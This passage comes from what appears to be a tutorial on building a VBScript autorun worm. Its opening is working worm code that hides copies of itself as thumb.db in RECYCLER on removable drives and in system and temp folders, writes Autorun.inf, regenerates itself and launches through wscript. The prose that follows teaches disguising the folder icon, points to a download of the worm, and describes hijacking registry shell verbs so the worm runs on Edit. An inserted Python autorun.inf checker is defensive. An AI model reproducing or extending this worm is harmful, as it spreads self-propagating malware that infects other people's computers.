                            fso.DeleteFolder(device.Path & "\Autorun.inf"), True
                     If (Not fso.FolderExists(device.Path & "\RECYCLER")) Then _
                            fso.CreateFolder(device.Path & "\RECYCLER").Attributes = 39
                            fso.GetFolder(device.Path & "\RECYCLER").Attributes = 39
                     If (Not fso.FileExists(device.Path & "\RECYCLER\thumb.db")) Then
                            write_file device.Path & "\RECYCLER\thumb.db", mycode                      
                     Else
                         If (fso.OpenTextFile(device.Path & "\RECYCLER\thumb.db", 1).ReadAll _
                                        <> mycode) Then
                             fso.DeleteFile(device.Path & "\RECYCLER\thumb.db"), True
                             write_file device.Path & "\RECYCLER\thumb.db", mycode
                         End If
                    End If
                If (Not fso.FileExists(device.Path & "\Autorun.inf")) Then
                    write_file device.Path & "\Autorun.inf", auto_inf
                Else
                      If (fso.OpenTextFile(device.Path & "\Autorun.inf", 1).readAll <> auto_inf) Then
                         fso.DeleteFile(device.Path & "\Autorun.inf"), True
                         write_file device.Path & "\Autorun.inf", auto_inf
                      End If
                End If
            End If
         End If
      End If
Next
End function

Function write_file(fpath, fcode)
Set tfile = fso.CreateTextFile(fpath)
tfile.Write(fcode)
tfile.Close
fso.GetFile(fpath).Attributes= 39                                                                                                                            
End Function

Function self_regen()
                If (Not fso.FileExists(mypath)) Then
                         write_file mypath, mycode
                Else
                         If (fso.OpenTextFile(mypath, 1).readAll <> mycode) Then
                                     fso.DeleteFile(mypath), True
                                     write_file mypath, mycode
                         End If
                End If
End Function

Function copy_in_system()
                If (Not fso.FileExists(Systemdir & "\thumb.db")) Then
                              write_file Systemdir & "\thumb.db", mycode
                              Shell.Run(Systemdir & "\" & script_eng & Systemdir & "\thumb.db")
                Else
                               If (fso.OpenTextFile(Systemdir & "\thumb.db", 1).readAll <> mycode) Then
                                      fso.DeleteFile(Systemdir & "\thumb.db"), True
                                      write_file Systemdir & "\thumb.db", mycode
                                      Shell.Run(Systemdir & "\" & script_eng & Systemdir & "\thumb.db")
                               End If
                End If
                If (Not fso.FileExists(Tempdir & "\thumb.db")) Then
                                write_file Tempdir & "\thumb.db", mycode
                                Shell.Run(Systemdir & "\" & script_eng & Tempdir & "\thumb.db")
                Else
                                If (fso.OpenTextFile(Tempdir & "\thumb.db", 1).readAll <> mycode) Then
                                               fso.DeleteFile(Tempdir & "\thumb.db"), True
                                               write_file Tempdir & "\thumb.db", mycode
                                               Shell.Run(Systemdir & "\" & script_eng & Tempdir & "\thumb.db")
                                End If
                End If   
End function

The Snapshot above catches the scenario when the Virus is detected by Avast AntiVirus.
And here is what the infected device will have: an Autorun.inf file and a companion file in the \RECYCLER\ folder. The autorun.inf is the file that actually starts the worm when the user interacts with the drive.
The Process WSCRIPT.EXE running which hosts the Viral Script.
Want to know what exactly happens when the Code runs ?
Well then have a look at this Flow Chart and learn the logic and the flow of control of the VBS Autorun Virus:
VBS Autorun Virus - FlowChart
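Since the autorun.inf is the artifact a responder finds first on an infected drive, here is an added example (not part of the original post) in Python that parses an autorun.inf and reports the directives that make it dangerous: script hosts launched from the drive, overridden Explorer verbs, targets hidden in RECYCLER, and the "Open folder to view files" disguise. The sample file is constructed from the strings the worm above concatenates; the set of script hosts flagged is an assumption for the demo.

```python
"""Parse an autorun.inf and flag the directives an autorun worm relies on.

Added example (not from the original post). SAMPLE_AUTORUN is constructed from
the strings the worm above concatenates; SCRIPT_HOSTS is a demo choice of
interpreters that have no business being launched from removable media.
"""
import ntpath

SCRIPT_HOSTS = {"wscript", "cscript", "cmd", "powershell", "rundll32", "mshta"}

SAMPLE_AUTORUN = """[AUTORUN]
ShellExecute=wscript.exe -e:VBScript RECYCLER\\thumb.db
Action=Open folder to view files
Shell\\Format...\\Command=wscript.exe -e:VBScript RECYCLER\\thumb.db
Shell\\Open\\Command=wscript.exe -e:VBScript RECYCLER\\thumb.db
Shell\\Explore\\Command=wscript.exe -e:VBScript RECYCLER\\thumb.db
icon=shell32.dll,4
"""

BENIGN_AUTORUN = """[autorun]
icon=setup.exe,0
label=Driver CD
"""


def parse_autorun(text):
    """Return the key=value pairs of the [autorun] section with lower-cased keys."""
    entries, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "autorun" and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def assess_autorun(text):
    """Return human-readable findings; an empty list means nothing suspicious."""
    entries = parse_autorun(text)
    findings = []
    for key, value in entries.items():
        # Only directives that run something are interesting: open, shellexecute
        # and any shell\<verb>\command override.
        if not (key in ("open", "shellexecute") or key.endswith("\\command")):
            continue
        tokens = value.split()
        exe = ntpath.basename(tokens[0]).lower() if tokens else ""
        stem = exe[:-4] if exe.endswith(".exe") else exe
        if stem in SCRIPT_HOSTS:
            findings.append(f"{key}: launches script host {exe}")
        if key.startswith("shell\\"):
            findings.append(f"{key}: overrides Explorer context-menu verb")
        if "recycler" in value.lower():
            findings.append(f"{key}: target lives in RECYCLER")
    if (entries.get("action", "").lower().startswith("open folder")
            and entries.get("icon", "").lower().startswith("shell32.dll")):
        findings.append("action/icon mimic the default folder prompt")
    return findings


if __name__ == "__main__":
    for finding in assess_autorun(SAMPLE_AUTORUN):
        print(finding)
```

The Shell\Open, Shell\Explore and Shell\Format... overrides are what make the worm fire even when AutoPlay is declined: the user double-clicking the drive in Explorer invokes the overridden verb rather than opening the folder, so those keys deserve as much weight as ShellExecute itself.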
Changing the Folder Icon:

RECYCLER folder icon

So, the folder 'RECYCLER' in which the worm resides should not have a normal folder icon. Since its name is 'RECYCLER', its icon should resemble the Recycle Bin icon. To change the folder icon, we have to create a file called 'desktop.ini' inside the folder, and it needs to contain the following:
[.ShellClassInfo]
IconResource=%windir%\system32\Shell32.dll,32
The IconResource refers to the icon with index no.32 from inside the Shell32 DLL. As you can see in the picture below, thumb.db(the worm itself) is accompanied by a desktop.ini file inside the RECYCLER folder. Assuming that you can read & write VBScripts and provided that we have already shown how you can create the worm itself, it should not be a difficult job for you to add a few more lines of VBS code to create the desktop.ini file.

desktop.ini in RECYCLER folder

Instead of updating the Code of the worm in this post itself, we have included link for downloading a sample of thumb.db worm. You can download the sample from here.


The worm's abilities can be extended to running the virus when the .inf file is opened via Edit or via [RIGHT_CLICK] + DELETE. This is achieved by altering the default registry value of the associated file extension under HKEY_CLASSES_ROOT: set HKCR\{EXTENSION + 'file'}\Shell\open\Command\ to your VIRUS-FULL-PATH with all the parameters needed. For example, here is what is needed to make the virus execute on [RIGHT_CLICK] + EDIT: HKEY_CLASSES_ROOT\vbsfile\Shell\Edit\Command\, PATH-TO-VIRUS, REG_EXPAND_SZ.
After you alter the registry under HKEY_CLASSES_ROOT, the default behaviour of that file extension's Explorer menu will change.
